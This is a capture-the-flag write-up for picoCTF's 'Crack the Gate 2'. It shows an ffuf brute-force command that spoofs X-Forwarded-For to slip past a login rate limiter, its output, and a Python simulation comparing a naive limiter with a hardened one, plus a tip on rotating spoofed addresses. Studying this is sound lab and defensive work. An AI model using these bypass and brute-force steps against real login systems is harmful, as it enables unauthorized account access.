Crack the Gate 2
The login system has been upgraded with a basic rate-limiting mechanism that locks out repeated failed attempts from the same source. We’ve received a tip that the system might still trust user-controlled headers. Your objective is to bypass the rate-limiting restriction and log in using the known email address: ctf-player@picoctf.org and uncover the hidden secret. Additional details will be available after launching your challenge instance.
Here, as the description says, we are rate limited, and the hints tell us to read up on the X-Forwarded-For header. The application takes the client address from that header instead of from the TCP connection, so a request carrying a spoofed value is counted as coming from a different source, and the lockout never applies to us. We simply need to add this header to our request with a proxy IP (I used Google’s). I used ffuf to speed up the brute force, as it is faster than using Burp Intruder.
ffuf -u http://amiable-citadel.picoctf.net:57519/login -H "Content-Type: application/json" -H "X-Forwarded-For: 203.0.113.195" -w passwords.txt:FUZZ -d '{"email":"ctf-player@picoctf.org","password":"FUZZ"}' -X POST -mc 200 -ac -t 50
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://amiable-citadel.picoctf.net:57519/login
:: Wordlist : FUZZ: /home/t4qi/CTFs/Platforms/PICO-CTF/WEB/Medium/crack_the_gate_2/passwords.txt
:: Header : Content-Type: application/json
:: Header : X-Forwarded-For: 203.0.113.195
:: Data : {"email":"ctf-player@picoctf.org","password":"FUZZ"}
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200
________________________________________________
KTxyUtJw [Status: 200, Size: 17, Words: 1, Lines: 1, Duration: 206ms]
fFWxC3W6 [Status: 200, Size: 132, Words: 1, Lines: 1, Duration: 206ms]
jCzS5pSV [Status: 200, Size: 17, Words: 1, Lines: 1, Duration: 205ms]
:: Progress: [20/20] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::

The output of this command gives us three passwords that came back with status 200. Note that the server also answers 200 for the filtered (failed) attempts, so matching on status alone is not enough; the response size is what separates them, and one candidate (fFWxC3W6) has a much larger body (132 bytes against 17 for the other two). I tried it and got the flag.
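To make the root cause concrete, here is an added example that is not part of the original write-up or of the picoCTF challenge code. It reconstructs a hypothetical failed-login limiter in two forms: a naive one that keys the lockout on whatever the first X-Forwarded-For value says, and a hardened one that only honours the header when the connection actually arrives from a trusted reverse proxy (walking the header right to left past trusted hops, falling back to the socket address on garbage). It then replays the brute force against both. It goes one step beyond the ffuf run above by rotating the spoofed address on every request, which defeats a limiter that counts per forwarded address rather than one that simply ignores the real peer. The lockout threshold, the trusted proxy range, the attacker address and the wordlist are all constructed assumptions; the password is the one the ffuf run found.

```python
from ipaddress import ip_address, ip_network
from typing import Callable, Dict, Iterable, List, Optional

MAX_FAILURES = 5                     # assumed lockout threshold
TRUSTED_PROXIES = ["10.0.0.0/8"]     # assumed address range of the real reverse proxy
ATTACKER_ADDR = "198.51.100.7"       # attacker's socket address (constructed, TEST-NET-2)
REAL_PASSWORD = "fFWxC3W6"           # the password the ffuf run above turned up
# Constructed wordlist: 19 wrong guesses, then the right one, mirroring a 20-line list.
WORDLIST: List[str] = [f"wrong{i:02d}" for i in range(19)] + [REAL_PASSWORD]


def naive_client_ip(remote_addr: str, headers: Dict[str, str]) -> str:
    """Vulnerable: the first X-Forwarded-For value (attacker-controlled) becomes the key."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def hardened_client_ip(remote_addr: str, headers: Dict[str, str],
                       trusted_proxies: Iterable[str]) -> str:
    """Honour X-Forwarded-For only when the peer is a trusted proxy.

    Walks the header right to left, peeling off trusted proxy hops; the first
    untrusted hop is the client. Unparseable values fall back to the peer address.
    """
    nets = [ip_network(p, strict=False) for p in trusted_proxies]

    def trusted(addr: str) -> bool:
        try:
            return any(ip_address(addr) in n for n in nets)
        except ValueError:
            return False

    if not trusted(remote_addr):
        return remote_addr  # direct connection: the header is attacker-supplied, ignore it
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if trusted(hop):
            continue
        try:
            ip_address(hop)
        except ValueError:
            break  # garbage in the header: do not key the limiter on it
        return hop
    return remote_addr


class LoginRateLimiter:
    """Counts failed logins per key and refuses further attempts once locked."""

    def __init__(self, key_func: Callable[[str, Dict[str, str]], str]) -> None:
        self.key_func = key_func
        self.failures: Dict[str, int] = {}

    def attempt(self, remote_addr: str, headers: Dict[str, str], password: str) -> str:
        key = self.key_func(remote_addr, headers)
        if self.failures.get(key, 0) >= MAX_FAILURES:
            return "locked"
        if password == REAL_PASSWORD:
            self.failures.pop(key, None)
            return "ok"
        self.failures[key] = self.failures.get(key, 0) + 1
        return "denied"


def run_attack(naive: bool, spoof: bool) -> Optional[str]:
    """Replay the brute force from one socket address, optionally rotating X-Forwarded-For.

    Returns the recovered password, or None if the limiter locked us out first.
    """
    key_func = naive_client_ip if naive else (
        lambda addr, hdrs: hardened_client_ip(addr, hdrs, TRUSTED_PROXIES))
    limiter = LoginRateLimiter(key_func)
    for i, candidate in enumerate(WORDLIST):
        headers = {"X-Forwarded-For": f"203.0.113.{i + 1}"} if spoof else {}
        result = limiter.attempt(ATTACKER_ADDR, headers, candidate)
        if result == "ok":
            return candidate
        if result == "locked":
            return None
    return None


if __name__ == "__main__":
    print("naive limiter, spoofed header:", run_attack(True, True))    # fFWxC3W6
    print("naive limiter, no header:     ", run_attack(True, False))   # None
    print("hardened limiter, spoofed:    ", run_attack(False, True))   # None
```

The check a defender wants is the middle case turned around: with the hardened key function the spoofed header changes nothing, because the peer address is not a trusted proxy and the lockout lands on the attacker's real address after five failures. If the page's own ffuf run had hit a limiter that counted per forwarded address, the fix on the attacker side would be the rotation shown here, for example with a second ffuf wordlist of addresses in pitchfork mode, rather than a single fixed X-Forwarded-For value.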